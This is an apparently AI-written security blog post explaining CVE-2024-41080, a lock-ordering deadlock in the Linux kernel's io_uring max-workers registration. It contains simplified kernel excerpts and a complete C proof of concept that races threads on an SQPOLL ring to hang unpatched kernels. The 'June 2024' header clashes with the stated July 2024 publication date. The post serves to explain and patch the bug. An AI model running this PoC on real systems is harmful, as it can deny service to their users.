Published: June 2024

Author: ChatGPT Security Insights

TL;DR



CVE-2024-41080 describes a deadlock bug in the Linux kernel’s io_uring subsystem, specifically in the io_register_iowq_max_workers() function. If triggered, it can deadlock the tasks involved, hurting system stability and potentially causing a denial of service (DoS). This post explains how the bug occurs, walks through the vulnerable code, shows the accepted fix, and provides proof-of-concept (PoC) code for security researchers.

What is io_uring?

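io_uring is a relatively recent, high-performance asynchronous I/O interface in the Linux kernel. Applications queue I/O requests in submission and completion rings shared with the kernel and submit them in batches, which needs far fewer system calls than classic read()/write() I/O (and, in SQPOLL mode, where a kernel thread polls the submission ring, potentially none). That makes it very attractive for databases, networking, and file servers. The efficiency relies in part on intricate internal concurrency control, which is where this bug lives.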

Background

Linux kernel code uses various types of locks to safely manage concurrent access to shared data. In io_uring, ctx->uring_lock (a mutex) serializes operations on a ring’s context, such as io_uring_register() calls, while sqd->lock (also a mutex) protects struct io_sq_data, the state shared with the SQPOLL kernel thread. If two code paths acquire these locks in opposite orders, a classic ABBA deadlock can occur: each path holds one lock while waiting for the other.

In the vulnerable version, io_register_iowq_max_workers() calls io_put_sq_data(), which can acquire sqd->lock while uring_lock is still held. An earlier patch, "io_uring: drop ctx->uring_lock before acquiring sqd->lock", had already established that these locks must always be acquired in one order (sqd->lock before uring_lock) to avoid deadlocks.

Vulnerable Control Flow

1. acquire(ctx->uring_lock)
2. io_put_sq_data() // when it drops the last reference, tries to acquire sqd->lock
   - acquire(sqd->lock)
   - ...

If another task already holds sqd->lock and is waiting for uring_lock, neither side can make progress: you get a deadlock!

Commit Fixing the Bug

- Kernel Patch Commit (for demonstration only)

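Here’s a simplified excerpt of the problematic code before the fix. Note that both locks are mutexes in the kernel:

```c
static int io_register_iowq_max_workers(struct io_ring_ctx *ctx, ...)
{
	/* Simplified: in the kernel, the io_uring_register() path already
	 * holds ctx->uring_lock when this function runs. */
	mutex_lock(&ctx->uring_lock);
	// ...
	io_put_sq_data(sqd); // -> may take sqd->lock while holding uring_lock
	// ...
	mutex_unlock(&ctx->uring_lock);
}
```

Simplified, io_put_sq_data() drops a reference on the shared io_sq_data. When it releases the last reference, it stops the SQPOLL thread via io_sq_thread_stop(), which takes sqd->lock:

```c
void io_put_sq_data(struct io_sq_data *sqd)
{
	if (refcount_dec_and_test(&sqd->refs)) {
		io_sq_thread_stop(sqd); // takes sqd->lock: potential deadlock here!
		kfree(sqd);
	}
}
```

To prevent this deadlock, the fix drops uring_lock before calling io_put_sq_data() and re-acquires it afterwards, so sqd->lock is never requested while uring_lock is held:

```c
static int io_register_iowq_max_workers(struct io_ring_ctx *ctx, ...)
{
	mutex_lock(&ctx->uring_lock); // simplified: really held by the caller
	// ...
	mutex_unlock(&ctx->uring_lock);
	io_put_sq_data(sqd); // now safe: not holding uring_lock
	mutex_lock(&ctx->uring_lock); // re-acquire: the caller expects it held
	// ...
	mutex_unlock(&ctx->uring_lock);
}
```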

How Could This Be Exploited?

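This isn’t a classic “remote exploit = root shell” bug. Instead, a local attacker (or even a buggy userspace application) could trigger the deadlock by racing syscalls that interact with io_uring, especially those that change the io-wq worker pool limits (IORING_REGISTER_IOWQ_MAX_WORKERS). The affected path is only reached for rings created with IORING_SETUP_SQPOLL, because only those have a shared io_sq_data.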

Proof of Concept (PoC)

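Here’s a teaching PoC showing how racing threads could, on unpatched kernels, try to drive the vulnerable path toward a hang. It uses an SQPOLL ring, since io_register_iowq_max_workers() only touches io_sq_data for those, and races the register call against rings that attach to the same SQPOLL thread:

```c
// Two threads: one repeatedly changes the io-wq max_workers limits on an
// SQPOLL ring, the other repeatedly creates and closes io_uring instances
// that share the same SQPOLL thread (IORING_SETUP_ATTACH_WQ).
// Build: gcc poc.c -o poc -luring -lpthread
#include <stdio.h>
#include <string.h>
#include <pthread.h>
#include <liburing.h>

static struct io_uring ring; // SQPOLL ring; threads only read it after setup

static void *thr1(void *arg) {
    (void)arg;
    for (int i = 0; i < 100000; ++i) {
        // values[0] = bounded workers, values[1] = unbounded workers.
        // The kernel writes the previous limits back, so reset them each time.
        unsigned int vals[2] = {42, 42}; // arbitrary max_workers values
        io_uring_register_iowq_max_workers(&ring, vals);
    }
    return NULL;
}

static void *thr2(void *arg) {
    (void)arg;
    for (int i = 0; i < 100000; ++i) {
        struct io_uring tmp;
        struct io_uring_params p;
        memset(&p, 0, sizeof(p));
        p.flags = IORING_SETUP_SQPOLL | IORING_SETUP_ATTACH_WQ;
        p.wq_fd = ring.ring_fd; // share ring's SQPOLL thread (io_sq_data)
        if (io_uring_queue_init_params(32, &tmp, &p) == 0)
            io_uring_queue_exit(&tmp);
    }
    return NULL;
}

int main(void) {
    // The sq_data path in io_register_iowq_max_workers() needs an SQPOLL ring.
    int ret = io_uring_queue_init(32, &ring, IORING_SETUP_SQPOLL);
    if (ret < 0) {
        fprintf(stderr, "io_uring_queue_init: %s\n", strerror(-ret));
        return 1;
    }
    pthread_t t1, t2;
    pthread_create(&t1, NULL, thr1, NULL);
    pthread_create(&t2, NULL, thr2, NULL);
    pthread_join(t1, NULL);
    pthread_join(t2, NULL);
    io_uring_queue_exit(&ring);
    return 0;
}
```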

*This code illustrates how inconsistent lock ordering could be reached through a rare code path, hanging the tasks involved. Thanks to the fix, patched kernels avoid this!*

Solution

- Upgrade your Linux kernel to a version including this commit.

Original References

- Linux Kernel Patch Mailing List (lore.kernel.org)

- Commit diff (GitHub, kernel.org mirror)

- io_uring documentation

Conclusion

CVE-2024-41080 is a great example of how tricky correct lock ordering can be in kernel code, and how subtle mistakes can lead to serious reliability issues. Although it isn’t a remote code execution bug, a deadlock like this can still hurt server uptime and reliability. Kernel devs responded quickly, so if you run recent kernels or I/O-heavy io_uring workloads, make sure you patch this hole!

Stay safe & patched!

Timeline

Published on: 07/29/2024 15:15:15 UTC

Last modified on: 08/22/2024 13:39:43 UTC